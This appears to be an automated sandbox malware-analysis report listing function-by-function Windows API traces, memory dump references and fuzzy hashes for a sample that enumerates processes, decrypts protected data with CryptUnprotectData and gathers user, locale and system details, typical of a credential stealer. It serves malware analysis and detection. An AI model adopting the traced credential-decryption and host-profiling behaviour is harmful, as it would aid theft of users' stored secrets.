                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,00000001), ref: 004104AA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: /
                                                                                                                                                                                                                                                                                                  • API String ID: 507856799-4001269591
                                                                                                                                                                                                                                                                                                  • Opcode ID: ab2540c32def370dc3ccb5b7f219a36ccb40806ac267110b0901d9de57956097
                                                                                                                                                                                                                                                                                                  • Instruction ID: c556474e9021bd53722cce9fd1be39607c0121b4687c47c7bc64da4ab7de49f3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab2540c32def370dc3ccb5b7f219a36ccb40806ac267110b0901d9de57956097
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67317371900219EBDB10DFD9DC85BEEB7B9FB48704F50406EF605A3281DB785A84CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00410300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410311
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00410318
                                                                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 00410327
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410352
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: wwww
                                                                                                                                                                                                                                                                                                  • API String ID: 362916592-671953474
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9a7f8c275463387799c76c2b5357eec89d0a484b96840c6e095eb03c68c04584
                                                                                                                                                                                                                                                                                                  • Instruction ID: 05270ee5c02940d31badd105e9dc8504ebe92e995e35f2b1e0709388ccb36dab
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a7f8c275463387799c76c2b5357eec89d0a484b96840c6e095eb03c68c04584
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BF0A775B00224ABE71C5B689C0EFAA7B1E9B46311F044365FE1ACB2D0DA70581446D5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00410AA0 Relevance: 7.6, APIs: 5, Instructions: 80processCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410AEF
                                                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 00410AFF
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00410B11
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00410B7E
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00410B89
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 562399079-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: f92828822c5e3a766a07ba7ce07d337e575ff1d799c38124f09fc6912ca1c156
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0017932ee8b28542c993bd3d3cbb85d98208f81dbbf63d1189c3c8f2ca0ceaa0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f92828822c5e3a766a07ba7ce07d337e575ff1d799c38124f09fc6912ca1c156
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28217E71A00118EBCB10DFD5DC45BEEB7BDAB89B14F00416EE505A3291DBB86A488BA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00411BD0 Relevance: 7.6, APIs: 5, Instructions: 59processCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411C09
                                                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 00411C19
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00411C2B
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 00411C40
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411C62
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3f0b3f398bad895e9fddeaba7e30e3c8ded22fd77d7e4e16f717514778de6e78
                                                                                                                                                                                                                                                                                                  • Instruction ID: 783bd51883fbc9235abcb4e0eac7fc77d01b721e3b4511d284faf66e1083b937
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f0b3f398bad895e9fddeaba7e30e3c8ded22fd77d7e4e16f717514778de6e78
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6211BF76A01518ABC711CF89DC45BDEF7B9FB85711F10429AF905D3250D7785A40CBE0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00411720 Relevance: 6.1, APIs: 4, Instructions: 63memoryencryptionCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411744
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,00404EBA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00411753
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,00404EBA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041175A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateBinaryCryptProcessString
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 869800140-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a5bc244c91944e159526dac87f2701fa0a5e61637d43ef5c594d15196ce9044e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 25ec301e592552770448581482f48514acc17145e864118cceb557e7f86678fe
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5bc244c91944e159526dac87f2701fa0a5e61637d43ef5c594d15196ce9044e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9115E71600219ABDB10CFA5ED85EEBB7ADEF4A351F10455AFE08C7340D671AC508AA0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 004103E9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410406
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,00000001), ref: 004104AA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$FreeInfoLocalLocalelstrcatlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: /
                                                                                                                                                                                                                                                                                                  • API String ID: 3280604673-4001269591
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9d6df98df06dd7049007c4c707a33e25cbf5386fb355e087ae3499b3ae749645
                                                                                                                                                                                                                                                                                                  • Instruction ID: 28db25313739fa7c55f0f4920395dc49f99e05777687f376b1cd2e96ad76a857
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d6df98df06dd7049007c4c707a33e25cbf5386fb355e087ae3499b3ae749645
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54115E71A00219DBCB14DBD8D885BFDB7B9BB44300F54406EE605A3182DB785A89CBA9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00406FD0 Relevance: 4.5, APIs: 3, Instructions: 47memoryencryptionCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FF5
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?), ref: 0040700D
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 0040702E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2068576380-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9232affe9b4526a39fe20872f8c8b11f75dafd751c518c869054bd0ab9b412c9
                                                                                                                                                                                                                                                                                                  • Instruction ID: fbb42ef7c5f833057219cfc16333224a6ea03084bd53acd7e7d5f17b1ae716ea
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9232affe9b4526a39fe20872f8c8b11f75dafd751c518c869054bd0ab9b412c9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77011279A00209ABEB10DF98DC55FAA77B9EB88700F104559FB00AB380D675E9018B94
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00410220 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,01562F00,?,00401074,01562F00,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,01562F00,?,00401074,01562F00,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                                                                  • GetUserNameA.ADVAPI32(00000000,01562F00), ref: 00410247
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1206570057-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 473499ec4a489346d5b8381035135aa7156d3b2d8f7926a473b752b9a765c721
                                                                                                                                                                                                                                                                                                  • Instruction ID: 19b93291ffa213a11ad41bdc802fd7864df3898d1af9124162a70396b117772a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 473499ec4a489346d5b8381035135aa7156d3b2d8f7926a473b752b9a765c721
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88D012B9551228BBE7009BD49D0DFDA7B6DDB06751F001192FB05D3240D5F0590047E1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00410540 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2452939696-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: bd3555a00e90356374530ad1ecd833fb0b90ce51521324ff3aaf46634910a84e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3be55b1de734e5e70e2884e79743f6c7e3890d625af739cc694376e2c6be9e3c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd3555a00e90356374530ad1ecd833fb0b90ce51521324ff3aaf46634910a84e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17D012B590011CDBC710DB90EC85AAAB7BDAB48600F404695EF05A2140E6756A1D8AE5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 004188E0 Relevance: 207.2, APIs: 114, Strings: 4, Instructions: 691libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562700), ref: 004188F5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562740), ref: 0041890D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DB58), ref: 00418926
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DC90), ref: 0041893E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DC78), ref: 00418956
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DCA8), ref: 0041896F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01563F80), ref: 00418987
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DD20), ref: 0041899F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DCF0), ref: 004189B8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DD08), ref: 004189D0
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DB70), ref: 004189E8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562720), ref: 00418A01
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,015628C0), ref: 00418A19
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562760), ref: 00418A31
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562C60), ref: 00418A4A
